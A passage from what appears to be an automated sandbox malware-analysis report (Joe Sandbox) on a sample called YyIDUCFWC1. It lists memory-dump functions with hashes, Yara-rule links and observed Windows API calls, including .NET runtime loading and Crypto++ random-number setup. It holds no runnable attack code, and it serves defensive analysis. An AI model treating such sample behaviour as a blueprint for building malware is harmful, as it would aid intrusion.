                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D211C176504281DFDB15CF14D5C4B1ABF61FB84328F28C6AAD8494B656C33AE44ACB92
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 05B00868 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1709698902.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b00000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 169cccad853fefb6e0b1ed347c6ff50387a292a87000e35f24290db52a0103da
                                                                                                                                                                                                                                              • Instruction ID: 76b6e437b2e7a37d8be3b6b1d45b3ef9023f36c9f7e0e1c1c227c63b6ce6e33b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 169cccad853fefb6e0b1ed347c6ff50387a292a87000e35f24290db52a0103da
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 060156353101108FC748EB6DD898C6EBBEAFF8962035545A9E50ACB371DE32EC018BA4
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 0127D171 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1700300446.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_127d000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: bd1c16ae005c496eb67875cbdbe7c5daad668e7db55983dc13b20566db186b21
                                                                                                                                                                                                                                              • Instruction ID: ed4d73914861fb9616665b971fc92c025d22e1748b12de4e14c040a713374d15
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd1c16ae005c496eb67875cbdbe7c5daad668e7db55983dc13b20566db186b21
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6201DB311193489AF7115AADDD84767BFD8EF41324F18C469EE094A186C679D840C671
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 0127D170 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1700300446.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_127d000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 538a02d1086e2e98842c4e95d27b3fa7934856df9d76a469df4a5e79dabeaf97
                                                                                                                                                                                                                                              • Instruction ID: f3f42d8836aa34232c3c0b4ef64632483e6ba045defa5ef46affb30d5b68e245
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 538a02d1086e2e98842c4e95d27b3fa7934856df9d76a469df4a5e79dabeaf97
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 21F062714053489EEB118A5ADD84B63FFA8EF51725F18C45AEE084E286C2799844CA71
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 02D598D8 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1700874712.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2d50000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 26930fe6855e8b3cae7adc4d7c39527bae5d62a01ab04794f1c9a0637db62c80
                                                                                                                                                                                                                                              • Instruction ID: c333079ae55bdb616ba67103c71fbd4cfc09e0e481106ad789e2e65590374b2c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 26930fe6855e8b3cae7adc4d7c39527bae5d62a01ab04794f1c9a0637db62c80
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC01EFB0D5121EDFCB80EFA8D5446AEBBB0FB48205F5045AAD819A3340EBB11A54CB92
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 02D50868 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1700874712.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2d50000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: fe44b07e8de66adc2187fa53e32d67962cb01da1ab54c354f2b5cfe0a1c9feb7
                                                                                                                                                                                                                                              • Instruction ID: 4711f1d170947bd53c4acec2708fc402e15c24bb83f49f0fd604482009fb1d2d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe44b07e8de66adc2187fa53e32d67962cb01da1ab54c354f2b5cfe0a1c9feb7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9EF0E57048E2928ECB1727B860187F07F74DF0E397B085D96E89803551C7B94439E790
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 02D50A1A Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1700874712.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2d50000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 3dfe73dad355f4238b42577823d365efc69e6f526e9ecccb4f17277d7e4abcdf
                                                                                                                                                                                                                                              • Instruction ID: 01f7cd5ca652ca1b74ebe78441722e41d738b281c1a596ecc59813b465e6f1cd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3dfe73dad355f4238b42577823d365efc69e6f526e9ecccb4f17277d7e4abcdf
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 96E0926009E2948EDB0227A464287F83B7C5B5F387F085981F8C80326286D00C29CB21
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 02D50D29 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1700874712.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2d50000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: d67e2032abda30337bf92762f5316b572d2881d66abf544ab86dd7687e51fae7
                                                                                                                                                                                                                                              • Instruction ID: 80d17b4093d7b3fa136e2008688ad133c545a4c8877c6bfb0dfef121d3528c7d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d67e2032abda30337bf92762f5316b572d2881d66abf544ab86dd7687e51fae7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 49E01A7198520CDFCB80EFA8E84979CBBB8EB09305F1494A59C0893350EBB06B64DB41
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 02D5A830 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1700874712.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2d50000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 31d2062198671fecdee50f7c098fa0cd582efa591278a75a0bf904cd2837b4ed
                                                                                                                                                                                                                                              • Instruction ID: 7283ee5f83db71e989048379b5c7a016f48d63ae9c027dc163a11d4c565df679
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 31d2062198671fecdee50f7c098fa0cd582efa591278a75a0bf904cd2837b4ed
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9E0C974D04218EFCB80DFA8D40459CBBB4BB48310F00C5A9AC58A3310D7745E65DF80
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 02D5083A Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1700874712.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2d50000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: be90873775f74b658da8123b3ee8bcb816c3b76aa34398b0487b70d06f08a452
                                                                                                                                                                                                                                              • Instruction ID: bb2b3406e5be77cd17b7707ee5910f1a0be9e4a894ade83c67ec23945d5c8d4e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: be90873775f74b658da8123b3ee8bcb816c3b76aa34398b0487b70d06f08a452
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FDE0862114E3958ECB67267468787E03F705E4B346B0D55D6D8D447163C7640825D741
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 02D57CB8 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1700874712.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2d50000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 4718dbc326d58d94ae2a90a46b04a495a4908ec08f960b5981b09d7631092bfe
                                                                                                                                                                                                                                              • Instruction ID: 3caa0e9b6bf6cf9ce05813819238e22c2c0ce3f3fd742c87799535c7162bb25d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4718dbc326d58d94ae2a90a46b04a495a4908ec08f960b5981b09d7631092bfe
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6DE01270D49218DBEB049FA9E4049B8BBB8BB06315F1051A9EC4923351DB705E64C655
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 02D59998 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1700874712.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2d50000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: dde913a48a8082a2e7245f1eafd97a399646ed9a62c822725fbe41e300a462f4
                                                                                                                                                                                                                                              • Instruction ID: 8ac64ce71cde66485729a14b04e2d37148bda5bc62649713e68af09370cf4fe8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dde913a48a8082a2e7245f1eafd97a399646ed9a62c822725fbe41e300a462f4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77E0C2B0D4831ACECB40EFFCA0057AE7FF49B08200F00A555C88893301E6704515CFE2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 02D5C160 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1700874712.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2d50000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 694caa69a0018c45f408510e754ead6cec6c0d6755d696d64d95b38596db5713
                                                                                                                                                                                                                                              • Instruction ID: cc7f09bd24a0f7787ae31bbe7e46817d809cbfa5ef6de19eda5185962e12fa60
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 694caa69a0018c45f408510e754ead6cec6c0d6755d696d64d95b38596db5713
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5AD0123062430CAFDF205BB2D80DB167F99AB14391F008436F809C6351EB71C864DA54
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 02D50A28 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1700874712.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2d50000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 4883893bc019b8c36d8ba3e736a99f315dd3ab77dac9d07685ff14fa4e3614e1
                                                                                                                                                                                                                                              • Instruction ID: 274b579d134b802c5a6b3afe882f708b512c454c9409390d7b79faabd17ca2b4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4883893bc019b8c36d8ba3e736a99f315dd3ab77dac9d07685ff14fa4e3614e1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9C08C2008D6148ADA003AD874083F832BC67193C7F441800B8CD022104BE04828CA66
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 02D50848 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1700874712.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2d50000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: a3ada5dd4b01bd1358678a434aac75d7f5961e5a8acddf817920a327492e7e81
                                                                                                                                                                                                                                              • Instruction ID: 5e4fb5ee7c67696973d9150add3668439290b37d9e562398c46cbef254eb2600
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a3ada5dd4b01bd1358678a434aac75d7f5961e5a8acddf817920a327492e7e81
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7C02B3008A305CACE0032C4700CB707ABC530D317F442804A84D031508BF44834E9D1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                              Function 6CEF2D70 Relevance: 35.2, APIs: 23, Instructions: 669COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEF2DFF
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEF2E08
                                                                                                                                                                                                                                              • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEF2E7E
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEF2EB5
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF2EC1
                                                                                                                                                                                                                                                • Part of subcall function 6CEFC850: VariantInit.OLEAUT32(?), ref: 6CEFC88F
                                                                                                                                                                                                                                                • Part of subcall function 6CEFC850: VariantInit.OLEAUT32(?), ref: 6CEFC895
                                                                                                                                                                                                                                                • Part of subcall function 6CEFC850: SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEFC8A0
                                                                                                                                                                                                                                                • Part of subcall function 6CEFC850: SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CEFC8D5
                                                                                                                                                                                                                                                • Part of subcall function 6CEFC850: VariantClear.OLEAUT32(?), ref: 6CEFC8E1
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF30D5
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF3550
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF3563
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF3569
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Variant$ArrayClearSafe$Init$CreateElementVector$Destroy
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2012514194-0
                                                                                                                                                                                                                                              • Opcode ID: e63947fde0d86fb42b7085b48156a6a6595bec52da3386bbfff2c0120ba13ed0
                                                                                                                                                                                                                                              • Instruction ID: 72104d41a93485a896e459b9971ca5bc1be9a51eae3c4e312e92f8122fa00fa7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e63947fde0d86fb42b7085b48156a6a6595bec52da3386bbfff2c0120ba13ed0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46527E71D01218DFCB05DFA8C884BEEBBB5BF89304F248199E519AB741DB30A946CF91
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEEA0C0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 227libraryloaderCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CorBindToRuntimeEx.MSCOREE(v2.0.50727,wks,00000000,6CF60634,6CF60738,?), ref: 6CEEA119
                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(mscorwks), ref: 6CEEA145
                                                                                                                                                                                                                                              • __cftoe.LIBCMT ref: 6CEEA1FB
                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(?), ref: 6CEEA215
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000018), ref: 6CEEA265
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: HandleModule$AddressBindProcRuntime__cftoe
                                                                                                                                                                                                                                              • String ID: mscorwks$v2.0.50727$wks
                                                                                                                                                                                                                                              • API String ID: 1312202379-2066655427
                                                                                                                                                                                                                                              • Opcode ID: bbb09d4f1c4130087b25830f5db61dcf04877738745c4d7695fd27f8307f48c2
                                                                                                                                                                                                                                              • Instruction ID: e6214639dc3a7161d13aa79007211f05062997ade4026f4c80c514fa41549439
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bbb09d4f1c4130087b25830f5db61dcf04877738745c4d7695fd27f8307f48c2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 379155B1E052899FCB04DFE9D880A9EBBB5BF4D304F20866DE119EB744D731A905CB94
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF2DBB0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75encryptionCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,FF0C5935,6CF58180,00000000,?), ref: 6CF2DBFB
                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6CF2DC01
                                                                                                                                                                                                                                              • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000008), ref: 6CF2DC15
                                                                                                                                                                                                                                              • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000028), ref: 6CF2DC26
                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 6CF2DC2D
                                                                                                                                                                                                                                                • Part of subcall function 6CF2D9D0: GetLastError.KERNEL32(00000010,FF0C5935,75A8FC30,?,00000000), ref: 6CF2DA1A
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CF2DC78
                                                                                                                                                                                                                                                • Part of subcall function 6CF3AC75: RaiseException.KERNEL32(?,?,6CF39C34,FF0C5935,?,?,?,?,6CF39C34,FF0C5935,6CF69C90,6CF7B974,FF0C5935), ref: 6CF3ACB7
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AcquireContextCryptErrorLast$ExceptionException@8RaiseThrow
                                                                                                                                                                                                                                              • String ID: CryptAcquireContext$Crypto++ RNG
                                                                                                                                                                                                                                              • API String ID: 3279666080-1159690233
